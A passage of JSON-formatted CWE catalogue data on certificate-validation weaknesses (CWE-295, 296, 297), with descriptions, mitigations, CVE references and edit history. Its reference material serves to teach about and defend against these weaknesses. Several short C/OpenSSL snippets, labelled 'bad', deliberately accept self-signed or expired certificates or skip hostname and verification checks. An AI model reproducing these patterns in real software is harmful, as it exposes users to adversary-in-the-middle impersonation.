host.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"322","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"A certificate is a token that associates an identity (principal) to a cryptographic key. Certificates can be used to check if a public key belongs to the assumed owner."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Authentication"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Web Application Scanner"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Man-in-the-middle attack tool"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"Certificates should be carefully managed and checked to assure that data are encrypted with the intended owner\'s public key."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the hostname."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-121"},"Intro_Text":"This code checks the certificate of a connected peer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if ((cert = SSL_get_peer_certificate(ssl)) && host)if ((X509_V_OK==foo) || X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN==foo))","xhtml:div":[{"#text":"foo=SSL_get_verify_result(ssl);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// certificate looks good, host can be trusted"}}],"xhtml:br":""}},"Body_Text":"In this case, because the certificate is self-signed, there was no external authority that could prove the identity of the host. The program could be communicating with a different system that is spoofing the host, e.g. by poisoning the DNS cache or using an Adversary-in-the-Middle (AITM) attack to modify the traffic from server to client."},{"attr":{"@_Demonstrative_Example_ID":"DX-122"},"Intro_Text":"The following OpenSSL code obtains a certificate and verifies it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"cert = SSL_get_peer_certificate(ssl);if (cert && (SSL_get_verify_result(ssl)==X509_V_OK)) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// do secret things"}}}},"Body_Text":"Even though the \\"verify\\" step returns X509_V_OK, this step does not include checking the Common Name against the name of the host. That is, there is no guarantee that the certificate is for the desired host. The SSL connection could have been established with a malicious host that provided a valid certificate."},{"attr":{"@_Demonstrative_Example_ID":"DX-123"},"Intro_Text":"The following OpenSSL code ensures that there is a certificate and allows the use of expired certificates.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer(certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERR_CERT_HAS_EXPIRED==foo))","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//do stuff"}}}}}},"Body_Text":"If the call to SSL_get_verify_result() returns X509_V_ERR_CERT_HAS_EXPIRED, this means that the certificate has expired. As time goes on, there is an increasing chance for attackers to compromise the certificate."},{"attr":{"@_Demonstrative_Example_ID":"DX-124"},"Intro_Text":"The following OpenSSL code ensures that there is a certificate before continuing execution.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// got a certificate, do secret things"}}}},"Body_Text":"Because this code does not use SSL_get_verify_results() to check the certificate, it could accept certificates that have been revoked (X509_V_ERR_CERT_REVOKED). The software could be communicating with a malicious host."},{"attr":{"@_Demonstrative_Example_ID":"DX-125"},"Intro_Text":"The following OpenSSL code ensures that the host has a certificate.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","","","",""],"xhtml:i":["// got certificate, host can be trusted","//foo=SSL_get_verify_result(ssl);","//if (X509_V_OK==foo) ..."]}}}},"Body_Text":"Note that the code does not call SSL_get_verify_result(ssl), which effectively disables the validation step that checks the certificate."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"},{"Reference":"CVE-2021-22909","Description":"Chain: router\'s firmware update procedure uses curl with \\"-k\\" (insecure) option that disables certificate validation (CWE-295), allowing adversary-in-the-middle (AITM) compromise with a malicious firmware image (CWE-494).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22909"},{"Reference":"CVE-2008-4989","Description":"Verification function trusts certificate chains in which the last certificate is self-signed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4989"},{"Reference":"CVE-2012-5821","Description":"Web browser uses a TLS-related function incorrectly, preventing it from verifying that a server\'s certificate is signed by a trusted certification authority (CA)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5821"},{"Reference":"CVE-2009-3046","Description":"Web browser does not check if any intermediate certificates are revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3046"},{"Reference":"CVE-2011-0199","Description":"Operating system does not check Certificate Revocation List (CRL) in some cases, allowing spoofing using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0199"},{"Reference":"CVE-2012-5810","Description":"Mobile banking application does not verify hostname, leading to financial loss.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5810"},{"Reference":"CVE-2012-3446","Description":"Cloud-support library written in Python uses incorrect regular expression when matching hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3446"},{"Reference":"CVE-2009-2408","Description":"Web browser does not correctly handle \'\\\\0\' character (NUL) in Common Name, allowing spoofing of https sites.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408"},{"Reference":"CVE-2012-2993","Description":"Smartphone device does not verify hostname, allowing spoofing of mail services.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2993"},{"Reference":"CVE-2012-5822","Description":"Application uses third-party library that does not validate hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5822"},{"Reference":"CVE-2012-5819","Description":"Cloud storage management application does not validate hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5819"},{"Reference":"CVE-2012-5817","Description":"Java library uses JSSE SSLSocket and SSLEngine classes, which do not verify the hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5817"},{"Reference":"CVE-2010-1378","Description":"chain: incorrect calculation allows attackers to bypass certificate checks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1378"},{"Reference":"CVE-2005-3170","Description":"LDAP client accepts certificates even if they are not from a trusted CA.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3170"},{"Reference":"CVE-2009-0265","Description":"chain: DNS server does not correctly check return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0265"},{"Reference":"CVE-2003-1229","Description":"chain: product checks if client is trusted when it intended to check if the server is trusted, allowing validation of signed code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1229"},{"Reference":"CVE-2002-0862","Description":"Cryptographic API, as used in web browsers, mail clients, and other software, does not properly validate Basic Constraints.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0862"},{"Reference":"CVE-2009-1358","Description":"chain: OS package manager does not check properly check the return value, allowing bypass using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1358"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"459"}},{"attr":{"@_CAPEC_ID":"475"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-243"}},{"attr":{"@_External_Reference_ID":"REF-244"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-12-28","Modification_Importance":"Critical","Modification_Comment":"Converted from category to weakness class."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Background_Details, Modes_of_Introduction, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Certificate Issues","attr":{"@_Date":"2013-02-21"}}}},"296":{"attr":{"@_ID":"296","@_Name":"Improper Following of a Certificate\'s Chain of Trust","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not follow, or incorrectly follows, the chain of trust for a certificate back to a trusted root certificate, resulting in incorrect trust of any resource that is associated with that certificate.","Extended_Description":{"xhtml:p":["If a system does not follow the chain of trust of a certificate to a root server, the certificate loses all usefulness as a metric of trust. Essentially, the trust gained from a certificate is derived from a chain of trust -- with a reputable trusted entity at the end of that list. The end user must trust that reputable source, and this reputable source must vouch for the resource in question through the medium of the certificate.","In some cases, this trust traverses several entities who vouch for one another. The entity trusted by the end user is at one end of this trust chain, while the certificate-wielding resource is at the other end of the chain. If the user receives a certificate at the end of one of these trust chains and then proceeds to check only that the first link in the chain, no real trust has been derived, since the entire chain must be traversed back to a trusted source to verify the certificate.","There are several ways in which the chain of trust might be broken, including but not limited to:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Any certificate in the chain is self-signed, unless it the root.","Not every intermediate certificate is checked, starting from the original certificate all the way up to the root certificate.","An intermediate, CA-signed certificate does not have the expected Basic Constraints or other important extensions.","The root certificate has been compromised or authorized to the wrong party."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Exploitation of this flaw can lead to the trust of data that may have originated with a spoofed source."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands"],"Note":"Data, requests, or actions taken by the attacking entity can be carried out as a spoofed benign entity."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that proper certificate checking is included in the system design."},{"Phase":"Implementation","Description":"Understand, and properly implement all checks necessary to ensure the integrity of certificate trust integrity."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the full chain of trust."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-121"},"Intro_Text":"This code checks the certificate of a connected peer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if ((cert = SSL_get_peer_certificate(ssl)) && host)if ((X509_V_OK==foo) || X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN==foo))","xhtml:div":[{"#text":"foo=SSL_get_verify_result(ssl);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// certificate looks good, host can be trusted"}}],"xhtml:br":""}},"Body_Text":"In this case, because the certificate is self-signed, there was no external authority that could prove the identity of the host. The program could be communicating with a different system that is spoofing the host, e.g. by poisoning the DNS cache or using an Adversary-in-the-Middle (AITM) attack to modify the traffic from server to client."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2016-2402","Description":"Server allows bypass of certificate pinning by sending a chain of trust that includes a trusted CA that is not pinned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2402"},{"Reference":"CVE-2008-4989","Description":"Verification function trusts certificate chains in which the last certificate is self-signed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4989"},{"Reference":"CVE-2012-5821","Description":"Chain: Web browser uses a TLS-related function incorrectly, preventing it from verifying that a server\'s certificate is signed by a trusted certification authority (CA).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5821"},{"Reference":"CVE-2009-3046","Description":"Web browser does not check if any intermediate certificates are revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3046"},{"Reference":"CVE-2009-0265","Description":"chain: DNS server does not correctly check return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0265"},{"Reference":"CVE-2009-0124","Description":"chain: incorrect check of return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0124"},{"Reference":"CVE-2002-0970","Description":"File-transfer software does not validate Basic Constraints of an intermediate CA-signed certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0970"},{"Reference":"CVE-2002-0862","Description":"Cryptographic API, as used in web browsers, mail clients, and other software, does not properly validate Basic Constraints.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0862"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to follow chain of trust in certificate validation"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-245"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 23: Improper Use of PKI, Especially SSL." Page 347"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Failure to Follow Chain of Trust in Certificate Validation","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Following of Chain of Trust for Certificate Validation","attr":{"@_Date":"2013-02-21"}}]}},"297":{"attr":{"@_ID":"297","@_Name":"Improper Validation of Certificate with Host Mismatch","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software communicates with a host that provides a certificate, but the software does not properly ensure that the certificate is actually associated with that host.","Extended_Description":{"xhtml:p":["Even if a certificate is well-formed, signed, and follows the chain of trust, it may simply be a valid certificate for a different site than the site that the software is interacting with. If the certificate\'s host-specific data is not properly checked - such as the Common Name (CN) in the Subject or the Subject Alternative Name (SAN) extension of an X.509 certificate - it may be possible for a redirection or spoofing attack to allow a malicious host with a valid certificate to provide data, impersonating a trusted host. In order to ensure data integrity, the certificate must be valid and it must pertain to the site that is being accessed.","Even if the software attempts to check the hostname, it is still possible to incorrectly check the hostname. For example, attackers could create a certificate with a name that begins with a trusted name followed by a NUL byte, which could cause some string-based comparisons to only examine the portion that contains the trusted name.","This weakness can occur even when the software uses Certificate Pinning, if the software does not verify the hostname at the time a certificate is pinned."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"The data read from the system vouched for by the certificate may not be from the expected system."},{"Scope":["Authentication","Other"],"Impact":"Other","Note":"Trust afforded to the system in question - based on the malicious certificate - may allow for spoofing or redirection attacks."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"Set up an untrusted endpoint (e.g. a server) with which the software will connect. Create a test certificate that uses an invalid hostname but is signed by a trusted CA and provide this certificate from the untrusted endpoint. If the software performs any operations instead of disconnecting and reporting an error, then this indicates that the hostname is not being checked and the test certificate has been accepted."},{"Method":"Black Box","Description":"When Certificate Pinning is being used in a mobile application, consider using a tool such as Spinner [REF-955]. This methodology might be extensible to other technologies."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Fully check the hostname of the certificate and provide the user with adequate information about the nature of the problem and how to proceed."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the hostname."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-122"},"Intro_Text":"The following OpenSSL code obtains a certificate and verifies it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"cert = SSL_get_peer_certificate(ssl);if (cert && (SSL_get_verify_result(ssl)==X509_V_OK)) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// do secret things"}}}},"Body_Text":"Even though the \\"verify\\" step returns X509_V_OK, this step does not include checking the Common Name against the name of the host. That is, there is no guarantee that the certificate is for the desired host. The SSL connection could have been established with a malicious host that provided a valid certificate."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2012-5810","Description":"Mobile banking application does not verify hostname, leading to financial loss.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5810"},{"Reference":"CVE-2012-5811","Description":"Mobile application for printing documents does not verify hostname, allowing attackers to read sensitive documents.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5811"},{"Reference":"CVE-2012-5807","Description":"Software for electronic checking does not verify hostname, leading to financial loss.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5807"},{"Reference":"CVE-2012-3446","Description":"Cloud-support library written in Python uses incorrect regular expression when matching hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3446"},{"Reference":"CVE-2009-2408","Description":"Web browser does not correctly handle \'\\\\0\' character (NUL) in Common Name, allowing spoofing of https sites.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408"},{"Reference":"CVE-2012-0867","Description":"Database program truncates the Common Name during hostname verification, allowing spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0867"},{"Reference":"CVE-2010-2074","Description":"Incorrect handling of \'\\\\0\' character (NUL) in hostname verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2074"},{"Reference":"CVE-2009-4565","Description":"Mail server\'s incorrect handling of \'\\\\0\' character (NUL) in hostname verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4565"},{"Reference":"CVE-2009-3767","Description":"LDAP server\'s incorrect handling of \'\\\\0\' character (NUL) in hostname verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3767"},{"Reference":"CVE-2012-5806","Description":"Payment processing module does not verify hostname when connecting to PayPal using PHP fsockopen function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5806"},{"Reference":"CVE-2012-2993","Description":"Smartphone device does not verify hostname, allowing spoofing of mail services.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2993"},{"Reference":"CVE-2012-5804","Description":"E-commerce module does not verify hostname when connecting to payment site.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5804"},{"Reference":"CVE-2012-5824","Description":"Chat application does not validate hostname, leading to loss of privacy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5824"},{"Reference":"CVE-2012-5822","Description":"Application uses third-party library that does not validate 